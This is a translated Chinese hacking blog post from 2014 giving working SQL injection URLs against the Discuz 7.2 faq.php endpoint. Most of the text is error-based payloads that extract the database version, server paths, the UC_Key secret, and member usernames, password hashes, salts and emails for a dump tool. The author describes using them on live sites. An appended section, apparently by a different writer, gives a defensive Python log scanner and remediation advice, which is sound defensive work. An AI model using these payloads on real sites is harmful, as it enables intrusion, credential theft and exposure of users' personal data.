K8拉登哥哥's Blog

K8team: information security, network security, 0day vulnerabilities, penetration testing, hacking

Discuz 7.2 faq.php SQL injection vulnerability: dumping the administrator, dumping UC_Key, and the K8 database-dump statements

2014-07-07 23:32:56 | Category: Web_0day

The official patch is already out. Some sites were just about to get XX'd when somebody submitted it to WooYun and it got patched.
Damn, probably only that one site had the goddess's info, and it was patched in under an hour. Damn..

K8 injection-point dump tool, not available for download for now: http://weibo.com/k8gege
It was written in a hurry for an emergency, but it already supports dumping the database from plenty of injection points...
DZ is just one example; as long as you put ID=$var$ into the SQL statement, it can dump.
Not as much hassle or as slow as SQLMAP, and it doesn't lock up the way Burp does.
Even with VPN timeouts of over 2800 ms it dumps normally, without lagging or killing the target site.

[Screenshot: Discuz 7.2 /faq.php SQL injection, dumping the administrator and UC_Key with the K8 dump statements]

Demo video tutorial: http://pan.baidu.com/s/1i3gNeW9

http://www.xxx.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

Version
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Database
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28database(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MySQL path (@@basedir)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@basedir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
MySQL data path (@@datadir)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@datadir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
tmpdir (@@tmpdir)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28@@tmpdir,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

uc_key, in two passes, 64 characters. Not accurate: on a default install it dumps fine, but in practice it sometimes comes out as 90-odd characters when the real key is only 64.

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23

Then the uc key is dumped. It looks like it comes out at that length, but in practice it's not accurate and comes out at 100-plus characters.
After getting a shell and looking inside, the key was also 64 characters; on a default install, though, this dumps accurately.

exp1:

/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

exp2:

/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23

Below are the dump statements dedicated to the K8 dump tool (for sites where you can't get a shell and can't get into the admin panel).

Dump 1: max ID. The error shows '4063861' for key 'group_key'; there is an extra 1 on the end (the floor(rand(0)*2) value concatenated onto the result).
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20max(uid)%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

Dump 1: total count, 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat(count(*))%20from%20uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

Dump 1: username, password, email (doesn't display in full)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 2: username, password, email (doesn't display in full)
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt,0x3a,email%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

So they have to be dumped separately: id, username and password in one pass, and ID and email in another.

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID and email
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

Dump 1: corresponding dump statement
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
ID and email
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20uc_members%20where%20uid%20=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

========================================================================================================

Dump 2: max ID
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28max(uid)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
Dump 2: total count, 263139
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28count(*)%29%20from%20cdb_uc_members%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

Dump 2
/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,username,0x3a,password,0x3a,salt%29%20from%20cdb_uc_members where uid=$var$%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28uid,0x3a,email%29%20from%20cdb_uc_members where uid=2%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


The two dump payloads for dz7.2,
because on some sites the table is cdb_uc_members and on others uc_members.


For injections in other programs, write the statement separately; the id variable is $var$.

Suppose where uid=1 dumps the record with id 1;
then the dump statement is written with where uid=$var$.
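As an added defender-side example (not part of the original post, and not the K8 tool), the following Python scans web-server access-log lines for the request shape every payload above shares: faq.php?action=grouppermission with gids[...] values that are not plain integers, a nested array index such as gids[100][0], and the classic error-based signature floor(rand(0)*2) ... group by, which leaks the concatenated value through MySQL's "Duplicate entry ... for key 'group_key'" message. The log lines are constructed (documentation IP ranges; line 1 is the version-fingerprinting URL from the post); the function and constant names are my own. The durable fix on the application side is to cast every usergroup id to an integer before it reaches the query and to stop echoing database errors to the client, since the error message is the exfiltration channel.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined log format). Line 1 carries the
# version-fingerprinting request from the post; lines 2 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2014:23:32:56 +0800] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 HTTP/1.1" 200 5123
203.0.113.5 - - [07/Jul/2014:23:33:01 +0800] "GET /faq.php?action=grouppermission&gids[1]=7&gids[2]=8 HTTP/1.1" 200 4210
198.51.100.9 - - [07/Jul/2014:23:33:10 +0800] "GET /faq.php?action=faq HTTP/1.1" 200 3001
"""

# Request target as logged in combined format: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# The error-based technique used throughout the post: GROUP BY on a column built
# from floor(rand(0)*2) forces "Duplicate entry '<value>1' for key 'group_key'",
# and the concatenated value rides out inside that error message.
ERROR_BASED_RE = re.compile(
    r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by",
    re.IGNORECASE | re.DOTALL,
)
SQL_KEYWORD_RE = re.compile(r"\b(select|union|concat|information_schema)\b", re.IGNORECASE)


def analyse_request(target):
    """Return a list of (parameter, reason) findings for one request target.

    Only faq.php?action=grouppermission is inspected; usergroup ids passed in
    gids[...] are expected to be plain integers, so anything else is flagged.
    """
    findings = []
    parts = urlsplit(target)
    if not parts.path.endswith("faq.php"):
        return findings
    # parse_qsl percent-decodes values; keys such as gids[100][0] stay verbatim.
    params = parse_qsl(parts.query, keep_blank_values=True)
    if dict(params).get("action") != "grouppermission":
        return findings
    for key, value in params:
        if not key.startswith("gids["):
            continue
        if key.count("[") > 1:
            findings.append((key, "nested array index where a scalar usergroup id is expected"))
        if not value.isdigit():
            findings.append((key, "non-integer usergroup id: %r" % value))
        if ERROR_BASED_RE.search(value):
            findings.append((key, "error-based injection signature: floor(rand(0)*2) ... group by"))
        elif SQL_KEYWORD_RE.search(value):
            findings.append((key, "SQL keyword inside usergroup id"))
    return findings


def scan_log(text):
    """Scan access-log text; return [(line_no, findings), ...] for flagged lines."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = analyse_request(match.group("target"))
            if findings:
                hits.append((line_no, findings))
    return hits


if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        print("line %d:" % line_no)
        for param, reason in findings:
            print("  %s -> %s" % (param, reason))
```

Run against the constructed log, only line 1 is flagged, with four findings: a non-integer value in gids[99], and a nested index, a non-integer value and the error-based signature in gids[100][0]. The integer check is the rule worth keeping long term: it catches any future variation on the same entry point regardless of the SQL that follows, while the floor(rand(0)*2) signature also fires on the same technique aimed at other parameters or endpoints if the path check is relaxed.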
Copyright © 1997-2016 NetEase